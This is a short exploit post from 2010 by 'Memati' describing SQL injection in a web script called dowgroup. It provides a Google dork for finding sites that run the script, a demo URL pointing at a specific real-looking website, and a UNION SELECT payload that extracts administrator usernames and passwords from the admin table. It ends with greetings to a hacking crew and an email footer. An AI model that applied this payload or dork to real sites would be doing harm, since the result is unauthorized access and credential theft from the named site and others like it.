===================================================================================+ # Exploit Title: dowgroup sql injection # Date: 12-01-2010 # Author: Memati ============================================================================== [*] Note : Keep Away Of Muslim Site ============================================================================== [*] My home: [ http://sec-war.com ] [*] For Ask: [hebarieh@hotmail.com] [*] Script: [ dowgroup ] [*] Founder: [ Memati ] [*] Dork: [ Powered by www.dowgroup.com ] ######################################################################## ===[ Demo ]=== http://www.stocksforlife.com/data_desc.php?data=articles&id=80 ===[ eXPLOIT ]=== union+select+1,concat_ws(0x3a,username,0x3a,password),3,4,5+from+admin-- [*] Gr33t : [ alnjm33 - pretador - ahmadso - jamba - jago-dz - root egy - egy sniper - xxx -xr57 - Super cristal- Red Virus - all sec-war.com] ________________________________ Hotmail: Trusted email with Microsoft’s powerful SPAM protection. Sign up now.